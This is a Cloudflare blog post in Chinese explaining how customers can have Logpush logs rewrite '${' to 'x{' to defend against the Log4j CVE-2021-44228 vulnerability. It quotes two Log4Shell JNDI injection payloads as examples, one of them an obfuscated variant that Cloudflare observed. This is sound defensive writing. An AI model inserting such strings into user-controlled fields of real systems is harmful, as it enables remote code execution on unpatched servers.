Subscribe to receive notifications of new posts:

Subscription confirmed. Thank you for subscribing!

清理 Cloudflare 日志以保护客户免受 Log4j 漏洞影响

Loading...

3 min read

2021 年 12 月 9 日,CVE-2021-44228这种零日漏洞利用在全球曝光。该漏洞会影响 Apache Log4j 实用工具。Cloudflare 立即更新了我们的 WAF,以帮助防御该漏洞,但我们建议客户尽快更新其系统。

然而,我们了解许多 Cloudflare 客户通过使用 Log4j 的软件使用其日志,因此我们还缓解了通过 Cloudflare 日志的任何漏洞利用。截至本文发稿时,我们在发送给客户的日志中发现高达 1000 次/秒的漏洞利用模式。

客户可以立即开始更新其 Logpush 作业,以自动修改可能触发此漏洞的令牌。您可以在我们的开发人员文档中阅读更多相关信息,或查看下面的详情。

攻击的工作方式

您可以在此处我们的博客帖子中阅读有关 Log4j 漏洞工作方式的更多信息。简而言之,攻击者可以在任何字符串中添加诸如 ${jndi:ldap://example.com/a} 之类的内容。Log4j 会在互联网上建立连接以检索此对象。

Cloudflare 日志包含由公共互联网上的最终用户控制的许多字符串字段,例如用户代理和 URL 路径。通过此漏洞,恶意用户有可能在读取这些字段并使用未修补的 Log4j 实例的任何系统上进行远程代码执行。

我们的缓解方案

遗憾的是,仅仅检查诸如 ${jndi:ldap 之类的令牌不足以防御此漏洞。由于模板中使用强大的语言表达式,还有必要检查混淆的变体。我们已经发现攻击者在使用诸如 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} 之类的真实用例变种。因此,修改令牌 ${ 是防御此漏洞的最常规方法。

令牌 ${ 在我们目前发送给客户的日志中出现的频率高达 1,000 次/秒。对一些记录进行抽查表明,该令牌的许多情况并不是企图利用此漏洞。因此我们无法安全地修改日志,而不影响可能预期在其日志中出现此令牌的客户。

从现在开始,客户可以更新其 Logpush 作业以修改所有地方的字符串 ${ 并将其替换为 x{。

为此,客户可以更新其 Logpush 作业选项配置以包括参数 CVE-2021-44228=true。有关如何使用 Logpush API 执行此操作的详细说明,请参阅我们的开发人员文档中的示例。请注意,此选项目前在 Cloudflare Dashboard 中不可用,仅可使用 API 进行修改。

在 Twitter 上讨论 在 Hacker News 上讨论 在 Reddit 上讨论

日志 漏洞 零日威胁 安全性 Log4J

在 Twitter 上关注 Cloudflare

Jon Levine |@jplevine

Cloudflare 丨Cloudflare

我们保护整个企业网络,帮助客户高效构建互联网规模应用,加速任何网站或互联网应用,抵御DDoS 攻击,阻止黑客,并为您的 Zero Trust 之旅提供协助

从任何设备访问 1.1.1.1,使用我们的免费应用加速和保护您的互联网。

如需进一步了解我们帮助构建更美好互联网的使命,请从这里开始。如果您正在寻找新的职业方向,请查看我们的空缺职位

漏洞 (CN) 简体中文 (CN) Log4J (CN) Log4Shell (CN)

Follow on Twitter

Jon Levine |@jplevine
Cloudflare |Cloudflare

Related Posts